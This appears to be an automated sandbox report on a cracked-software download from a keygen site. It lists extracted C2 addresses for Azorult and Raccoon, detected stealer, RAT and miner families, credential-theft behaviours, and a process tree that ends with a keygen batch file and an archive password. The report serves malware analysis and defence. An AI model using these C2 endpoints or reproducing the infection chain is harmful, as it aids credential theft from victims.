Resubmissions

18-04-2021 09:11

210418-l2b52pc3js 10

Analysis

  • max time kernel
    1791s
  • max time network
    1622s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-04-2021 09:11

General

  • Target

    https://keygenit.com/d/59def7ae481psn8p58q.html

  • Sample

    210418-l2b52pc3js

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 32 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:864
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2948
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/59def7ae481psn8p58q.html
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef7784f50,0x7fef7784f60,0x7fef7784f70
        2⤵
          PID:1064
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1100 /prefetch:2
          2⤵
            PID:1744
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1384 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1716
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1680 /prefetch:8
            2⤵
              PID:1568
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2036 /prefetch:1
              2⤵
                PID:1436
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2044 /prefetch:1
                2⤵
                  PID:316
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1
                  2⤵
                    PID:960
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:1
                    2⤵
                      PID:1072
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2496 /prefetch:1
                      2⤵
                        PID:712
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:1
                        2⤵
                          PID:1736
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2424 /prefetch:2
                          2⤵
                            PID:2312
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:8
                            2⤵
                              PID:2488
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
                              2⤵
                                PID:2608
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
                                2⤵
                                  PID:2656
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5356 /prefetch:8
                                  2⤵
                                    PID:2712
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:8
                                    2⤵
                                      PID:2760
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5272 /prefetch:8
                                      2⤵
                                        PID:2808
                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                        2⤵
                                          PID:2856
                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f2ca890,0x13f2ca8a0,0x13f2ca8b0
                                            3⤵
                                              PID:2872
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
                                            2⤵
                                              PID:2168
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
                                              2⤵
                                                PID:1600
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3144 /prefetch:8
                                                2⤵
                                                  PID:2264
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:8
                                                  2⤵
                                                    PID:2532
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:8
                                                    2⤵
                                                      PID:2108
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4516 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2668
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
                                                      2⤵
                                                        PID:2684
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
                                                        2⤵
                                                          PID:2728
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:8
                                                          2⤵
                                                            PID:2748
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
                                                            2⤵
                                                              PID:2784
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
                                                              2⤵
                                                                PID:2828
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
                                                                2⤵
                                                                  PID:2832
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:8
                                                                  2⤵
                                                                    PID:1592
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:8
                                                                    2⤵
                                                                      PID:2904
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4640 /prefetch:8
                                                                      2⤵
                                                                        PID:1784
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:8
                                                                        2⤵
                                                                          PID:1688
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3968 /prefetch:8
                                                                          2⤵
                                                                            PID:852
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3532 /prefetch:8
                                                                            2⤵
                                                                              PID:2052
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
                                                                              2⤵
                                                                                PID:3048
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4244 /prefetch:8
                                                                                2⤵
                                                                                  PID:2184
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2200
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
                                                                                    2⤵
                                                                                      PID:1720
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2664
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2700
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                          2⤵
                                                                                            PID:2692
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5392 /prefetch:8
                                                                                            2⤵
                                                                                              PID:2772
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:8
                                                                                              2⤵
                                                                                                PID:2796
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4532 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1676
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2960 /prefetch:8
                                                                                                  2⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:436
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2804
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2408
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2924
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:3024
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 /prefetch:8
                                                                                                          2⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1784
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:2780
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=532 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:2268
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:3056
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3424 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:2944
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1396
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:3064
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:3032
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1008,4742959787324511986,6123520935269596456,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1788 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:2516
                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x5a4
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2608
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe"
                                                                                                                        1⤵
                                                                                                                          PID:1348
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                            2⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2272
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:2928
